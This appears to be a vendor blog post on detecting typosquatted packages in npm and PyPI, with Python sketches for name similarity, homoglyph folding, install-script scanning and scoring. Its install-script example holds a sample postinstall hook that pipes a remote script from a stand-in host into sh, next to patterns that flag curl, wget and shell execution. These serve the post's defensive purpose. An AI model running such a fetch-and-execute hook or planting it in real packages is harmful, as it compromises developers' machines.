Software Supply Chain Security

Automating Typosquatting Detection for Package Registries

Typosquatting remains one of the most effective supply chain attacks. Automated detection using string distance algorithms, behavioral analysis, and registry monitoring can catch malicious packages before they reach your builds.

James
Security Architect

Typosquatting works because humans make predictable mistakes when typing package names. A developer who types requets instead of requests or lodsah instead of lodash may install a malicious package without realizing the error. The typosquatting package installs cleanly and may even provide the expected functionality by wrapping the legitimate package, all while silently executing malicious code.

Manual detection of typosquatting is impractical. Major registries receive thousands of new package uploads daily. The only viable defense is automated detection that operates continuously, evaluating new packages against known popular packages and organizational dependencies.

Detection Algorithms

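Levenshtein distance. The most basic approach measures the edit distance between a new package name and known popular packages. A new package with a Levenshtein distance of 1 from a popular package (one character added, removed, or changed) is suspicious. This catches single-character typos like requets (distance 1 from requests). A transposition such as reqeusts counts as distance 2, because plain Levenshtein treats a swap of two adjacent characters as two substitutions, so a threshold of 1 misses it.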

Limitations: Levenshtein distance generates many false positives for short package names, where almost any two names are within a few edits of each other, and it misses sophisticated squatting that uses names which sound alike but are many edits apart.
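As a rough illustration of the edit-distance check, the sketch below implements the standard dynamic-programming Levenshtein distance and filters a list of popular names by a distance threshold. The function names and the max_distance default are illustrative choices, not taken from any particular tool.

```python
def levenshtein(a: str, b: str) -> int:
    """Edit distance counting insertions, deletions, and substitutions."""
    if len(a) < len(b):
        a, b = b, a  # keep the shorter string in the inner loop
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            current.append(min(
                previous[j] + 1,         # deletion
                current[j - 1] + 1,      # insertion
                previous[j - 1] + cost,  # substitution (or match)
            ))
        previous = current
    return previous[-1]


def near_matches(candidate: str, popular: list[str], max_distance: int = 1) -> list[str]:
    """Popular names within max_distance edits of the candidate name."""
    return [name for name in popular
            if name != candidate and levenshtein(candidate, name) <= max_distance]


print(near_matches("requets", ["requests", "lodash"]))
```

Raising max_distance widens the net but, as noted above, quickly becomes noisy for short names.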

Damerau-Levenshtein distance. Extends Levenshtein to include transpositions (swapping adjacent characters) as a single operation. This better models actual typing errors, where transpositions are common.
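A minimal sketch of this idea follows. It implements the restricted variant usually called optimal string alignment, which counts a swap of two adjacent characters as one edit; the unrestricted Damerau-Levenshtein algorithm is slightly more involved. The function name is an illustrative choice.

```python
def osa_distance(a: str, b: str) -> int:
    """Edit distance where an adjacent transposition costs 1 (optimal string alignment)."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution (or match)
            )
            # Adjacent characters swapped: count the swap as a single edit.
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


print(osa_distance("reqeusts", "requests"))
print(osa_distance("lodsah", "lodash"))
```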

Keyboard distance analysis. Maps package name differences to physical keyboard layout. Characters that are adjacent on a QWERTY keyboard are more likely to be typos than characters that are far apart. A package named requezts (z is adjacent to s) is more suspicious than requepts (p sits on the opposite side of the keyboard from s).
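One way to approximate keyboard adjacency is to place each letter on a grid and compare distances. The sketch below assumes a US QWERTY layout; the row offsets (0.25 and 0.75 of a key width) and the max_gap cutoff are rough assumptions about key stagger, not measured values.

```python
import math

# Letter rows of a US QWERTY layout with an approximate horizontal stagger.
ROWS = [("qwertyuiop", 0.0), ("asdfghjkl", 0.25), ("zxcvbnm", 0.75)]
KEY_POS = {
    ch: (row_index, col_index + offset)
    for row_index, (row, offset) in enumerate(ROWS)
    for col_index, ch in enumerate(row)
}


def keys_adjacent(a: str, b: str, max_gap: float = 1.3) -> bool:
    """True when two letter keys are physical neighbours under the assumed layout."""
    if a == b or a not in KEY_POS or b not in KEY_POS:
        return False
    (r1, c1), (r2, c2) = KEY_POS[a], KEY_POS[b]
    return math.hypot(r1 - r2, c1 - c2) <= max_gap


def adjacent_key_substitution(candidate: str, target: str) -> bool:
    """True when the names differ in exactly one position and the two keys are neighbours."""
    if len(candidate) != len(target):
        return False
    diffs = [(x, y) for x, y in zip(candidate, target) if x != y]
    return len(diffs) == 1 and keys_adjacent(*diffs[0])


print(adjacent_key_substitution("requezts", "requests"))
print(adjacent_key_substitution("requepts", "requests"))
```

A production system would likely also cover digits, punctuation, and non-QWERTY layouts.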

Phonetic similarity. Algorithms like Soundex and Metaphone detect names that sound similar when spoken. This catches attacks like colour vs color or serialise vs serialize that exploit dialect differences.
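To make the phonetic comparison concrete, here is a small sketch of American Soundex, one of the algorithms named above. It ignores digits and separators in package names, which is a simplifying assumption; real names may need tokenizing first.

```python
# Consonant groups used by American Soundex.
CODES = {}
for digit, letters in {"1": "bfpv", "2": "cgjkqsxz", "3": "dt",
                       "4": "l", "5": "mn", "6": "r"}.items():
    for letter in letters:
        CODES[letter] = digit


def soundex(name: str) -> str:
    """Four-character Soundex code; returns an empty string for names with no ASCII letters."""
    letters = [ch for ch in name.lower() if ch.isascii() and ch.isalpha()]
    if not letters:
        return ""
    result = letters[0].upper()
    previous = CODES.get(letters[0], "")
    for ch in letters[1:]:
        if ch in "hw":
            continue  # h and w do not separate repeated codes
        code = CODES.get(ch, "")
        if code and code != previous:
            result += code
        previous = code  # vowels reset the previous code to ""
    return (result + "000")[:4]


print(soundex("colour"), soundex("color"))
print(soundex("serialise") == soundex("serialize"))
```

Soundex is coarse, so a match is best treated as one weak signal among several rather than a verdict.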

Homoglyph detection. Unicode provides characters that look identical to ASCII letters. An attacker can register a package name using Cyrillic characters that appear identical to Latin characters in most fonts. Detection requires Unicode normalization and homoglyph mapping.
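The following sketch shows the general shape of a homoglyph check: normalize the name, fold known look-alike characters to ASCII, and compare the result with a protected name. The CONFUSABLES table here is a tiny hand-picked sample of Cyrillic letters for illustration only; a fuller implementation would more likely load the confusables data published with Unicode Technical Standard #39.

```python
import unicodedata

# Illustrative subset: Cyrillic letters that resemble Latin letters in many fonts.
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u0441": "c",  # CYRILLIC SMALL LETTER ES
    "\u0445": "x",  # CYRILLIC SMALL LETTER HA
    "\u0443": "y",  # CYRILLIC SMALL LETTER U
    "\u0456": "i",  # CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
    "\u0455": "s",  # CYRILLIC SMALL LETTER DZE
}


def skeleton(name: str) -> str:
    """NFKC-normalize, lowercase, then fold known look-alikes to ASCII."""
    normalized = unicodedata.normalize("NFKC", name).lower()
    return "".join(CONFUSABLES.get(ch, ch) for ch in normalized)


def is_homoglyph_of(candidate: str, target: str) -> bool:
    """True when the names differ as strings but collapse to the same skeleton."""
    return candidate != target and skeleton(candidate) == skeleton(target)


spoofed = "r\u0435quests"  # second letter is Cyrillic, not Latin
print(is_homoglyph_of(spoofed, "requests"))
```

Note that NFKC normalization alone does not map Cyrillic to Latin, which is why the explicit mapping step is needed.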

Combo squatting. Adding or removing prefixes and suffixes (python-requests, requests-py, requests2, requests-lib). Pattern matching against common prefix/suffix patterns catches these variants.
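A simple way to sketch this pattern matching is to strip common affixes and trailing digits from a candidate name and see whether what remains is a protected package. The AFFIXES list below is a hypothetical starting point, not an authoritative catalogue.

```python
import re

# Hypothetical list of affixes that attackers commonly add to popular names.
AFFIXES = {"python", "py", "js", "node", "lib", "core", "utils", "dev"}


def strip_affixes(name: str) -> str:
    """Lowercase, unify separators, drop trailing digits and known affix tokens."""
    base = re.sub(r"[-_.]+", "-", name.lower())
    base = re.sub(r"\d+$", "", base)  # requests2 -> requests
    parts = [part for part in base.split("-") if part and part not in AFFIXES]
    return "-".join(parts)


def combo_squat_target(candidate: str, popular: set[str]):
    """Return the popular package the candidate appears to decorate, or None."""
    if candidate.lower() in popular:
        return None  # the candidate is itself a protected name
    stripped = strip_affixes(candidate)
    if stripped != candidate.lower() and stripped in popular:
        return stripped
    return None


for name in ["python-requests", "requests-py", "requests2", "requests-lib", "flask"]:
    print(name, "->", combo_squat_target(name, {"requests"}))
```

This only catches affixes joined by a separator or trailing digits; names such as pyrequests would need a prefix or suffix check on the raw string.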

Behavioral Analysis

String similarity alone generates too many false positives. Combining name analysis with behavioral analysis significantly improves accuracy.

Installation script analysis. Malicious typosquatting packages commonly execute code during installation, because that is the one moment the attacker can count on. Flagging packages with install scripts that make network connections, access environment variables, or execute system commands reduces false positives.
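For npm packages, install-time code is declared in the preinstall, install, and postinstall entries of the scripts field in package.json. The sketch below inspects those entries with a few regular expressions. The patterns are deliberately crude, illustrative assumptions; they only examine the command string and would not see what a referenced script file does.

```python
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Illustrative patterns only; real detection needs deeper analysis.
SUSPICIOUS = {
    "network": re.compile(r"curl|wget|https?://", re.IGNORECASE),
    "env_access": re.compile(r"process\.env|\$\{?[A-Z_]{2,}"),
    "shell_exec": re.compile(r"\b(?:bash|sh|powershell|eval)\b"),
}


def install_script_flags(package_json_text: str) -> set:
    """Return the labels of suspicious behaviours found in npm install hooks."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    flags = set()
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(command):
                flags.add(label)
    return flags


sample = '{"name": "requets", "scripts": {"postinstall": "curl https://example.invalid/x.sh | sh"}}'
print(sorted(install_script_flags(sample)))
```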

Metadata comparison. Legitimate packages have detailed descriptions, project URLs, author information, and license declarations. Typosquatting packages often have minimal or copied metadata.

Publication pattern. A new account that publishes multiple packages with names similar to popular packages in a short time is almost certainly conducting a typosquatting campaign.
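The burst pattern can be sketched as a sliding-window count per publishing account. The event tuple shape, the 24-hour window, and the threshold of three are assumptions for illustration; the sketch also assumes look-alike names have already been identified by the name checks, and it leaves out the account-age test.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def burst_publishers(events, lookalikes, window=timedelta(hours=24), threshold=3):
    """Accounts that published >= threshold look-alike packages within one window.

    events: iterable of (account, package_name, published_at) tuples.
    lookalikes: set of package names already flagged as resembling popular ones.
    """
    by_account = defaultdict(list)
    for account, name, published_at in events:
        if name in lookalikes:
            by_account[account].append(published_at)

    flagged = set()
    for account, stamps in by_account.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            # Shrink the window from the left until it spans at most `window`.
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(account)
                break
    return flagged


t0 = datetime(2024, 1, 1, 12, 0)
events = [
    ("acct1", "requets", t0),
    ("acct1", "reqeusts", t0 + timedelta(hours=1)),
    ("acct1", "requestss", t0 + timedelta(hours=2)),
    ("acct2", "lodahs", t0),
]
print(burst_publishers(events, {"requets", "reqeusts", "requestss", "lodahs"}))
```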

Dependency analysis. Typosquatting packages often depend on the legitimate package they are impersonating (to provide expected functionality while adding malicious behavior). A new package that depends on its name-neighbor and adds install scripts is highly suspicious.
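This combined signal is easy to express in code. In the sketch below, difflib.SequenceMatcher from the Python standard library stands in for whichever name-similarity measure you prefer, and the 0.8 ratio cutoff is an arbitrary assumption that would need tuning.

```python
import difflib


def impersonated_dependencies(name, dependencies, has_install_script, popular, min_ratio=0.8):
    """Popular packages that `name` both resembles and depends on.

    Returns an empty list unless the package also ships an install script.
    """
    if not has_install_script or name in popular:
        return []
    return sorted(
        dep for dep in dependencies
        if dep in popular
        and dep != name
        and difflib.SequenceMatcher(None, name, dep).ratio() >= min_ratio
    )


popular = {"requests", "urllib3", "lodash"}
print(impersonated_dependencies("requets", ["requests", "urllib3"], True, popular))
```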

Download trajectory. Legitimate packages accumulate downloads gradually through organic adoption. Typosquatting packages may have unusual download patterns -- either very few downloads (not yet discovered) or artificial spikes (attacker testing).

Building a Detection System

Step 1: Build a reference list. Compile a list of packages that matter to your organization: your direct dependencies, popular packages in your ecosystem, and your internal package names. This is your monitoring target list.
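For a Python project, Step 1 might look like the sketch below: it reads names from requirements.txt-style text, merges them with a list of popular packages and internal names, and normalizes everything using the PEP 503 rule (lowercase, with runs of hyphens, underscores, and dots collapsed to a single hyphen). The parsing is intentionally simple and skips option lines such as -r or -e; the sample package names are made up.

```python
import re


def normalize(name: str) -> str:
    """PEP 503 name normalization."""
    return re.sub(r"[-_.]+", "-", name).lower()


def names_from_requirements(text: str) -> set:
    """Extract normalized project names from requirements.txt-style text."""
    names = set()
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if not line or line.startswith("-"):  # skip blanks and pip options
            continue
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if match:
            names.add(normalize(match.group(0)))
    return names


def build_reference_list(requirements_text, popular, internal) -> set:
    """Union of direct dependencies, popular packages, and internal names."""
    return (names_from_requirements(requirements_text)
            | {normalize(n) for n in popular}
            | {normalize(n) for n in internal})


requirements = "requests==2.31.0\nFlask_Login>=0.6  # auth\n-r dev.txt\nnumpy\n"
print(sorted(build_reference_list(requirements, ["Django"], ["acme.utils"])))
```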

Step 2: Monitor registry feeds. Most registries provide real-time or near-real-time feeds of new package publications. npm has the registry changes feed. PyPI has the RSS feed and JSON API. Subscribe to these feeds and evaluate each new package against your reference list.

Step 3: Apply multi-layered detection. For each new package, calculate string distances against your reference list, check for homoglyphs and keyboard-adjacent substitutions, analyze package metadata for impersonation signals, and check for suspicious install scripts.

Step 4: Score and alert. Assign a suspicion score based on the combined signals. Alert your security team for packages above the threshold. Automatically block packages above a higher threshold from your private registry.
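Steps 3 and 4 can be sketched as a weighted sum over boolean signals with two thresholds. Every signal name, weight, and threshold below is a hypothetical placeholder; in practice these values would be calibrated against your own triage history.

```python
# Hypothetical weights for the signals discussed above.
WEIGHTS = {
    "near_name": 40,          # within edit distance 1 of a reference package
    "homoglyph": 30,          # collapses to a reference name after folding look-alikes
    "adjacent_key": 10,       # differing character is a keyboard neighbour
    "install_script": 25,     # runs suspicious code at install time
    "thin_metadata": 10,      # missing description, URL, or license
    "depends_on_target": 15,  # depends on the package it resembles
}
ALERT_THRESHOLD = 50   # notify the security team
BLOCK_THRESHOLD = 80   # reject from the private registry


def suspicion_score(signals: dict) -> int:
    """Sum the weights of the signals that fired, capped at 100."""
    return min(100, sum(weight for key, weight in WEIGHTS.items() if signals.get(key)))


def decide(score: int) -> str:
    """Map a score to one of: block, alert, allow."""
    if score >= BLOCK_THRESHOLD:
        return "block"
    if score >= ALERT_THRESHOLD:
        return "alert"
    return "allow"


signals = {"near_name": True, "install_script": True, "depends_on_target": True}
score = suspicion_score(signals)
print(score, decide(score))
```

Keeping the block threshold well above the alert threshold leaves room for human review of borderline packages.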

Step 5: Feedback loop. When alerts are triaged (true positive or false positive), feed the results back into the detection system to improve scoring accuracy.
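One simple, admittedly heuristic way to close the loop is to rescale each signal's weight by how often it appeared in confirmed true positives. The scaling rule below (multiply by 0.5 plus the observed precision) is an assumption chosen for illustration, not an established method; a statistical model trained on the triage labels would be a more rigorous alternative.

```python
def reweight(weights: dict, triaged: list) -> dict:
    """Rescale signal weights using triage outcomes.

    triaged: list of (signals_fired, is_true_positive) pairs, where
    signals_fired is a set of signal names present on the alerted package.
    """
    updated = {}
    for signal, weight in weights.items():
        outcomes = [is_tp for fired, is_tp in triaged if signal in fired]
        if not outcomes:
            updated[signal] = weight  # no evidence yet, keep the weight
            continue
        precision = sum(outcomes) / len(outcomes)
        # precision 0.5 keeps the weight; higher raises it, lower reduces it
        updated[signal] = round(weight * (0.5 + precision), 1)
    return updated


history = [
    ({"near_name"}, False),
    ({"near_name", "install_script"}, True),
    ({"near_name"}, False),
    ({"install_script"}, True),
]
print(reweight({"near_name": 40, "install_script": 25, "homoglyph": 30}, history))
```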

Open Source and Commercial Tools

GuardDog. A CLI tool that scans PyPI and npm packages for malicious indicators, including typosquatting signals.

Packj. Audits npm and PyPI packages for risky attributes including typosquatting, install scripts, and permissions.

Socket. Commercial service that monitors npm and PyPI for supply chain risks including typosquatting, with real-time alerting.

OSSGadget. Microsoft's open source tool suite that includes typosquatting detection capabilities.

Registry-Level Defenses

Some registries are implementing their own typosquatting defenses. npm blocks publication of packages with names too similar to popular packages. PyPI has implemented similar checks. These registry-level defenses are valuable but should not be your only protection -- they cannot catch all variants and do not protect against internal package name collision.

How Safeguard.sh Helps

Safeguard.sh provides continuous typosquatting monitoring across all major package registries, tailored to your specific dependency landscape. The platform evaluates new packages against your SBOM inventory using multi-layered detection algorithms and alerts your team when potential typosquatting threats are identified. This proactive monitoring catches impersonation attempts before they can affect your builds.
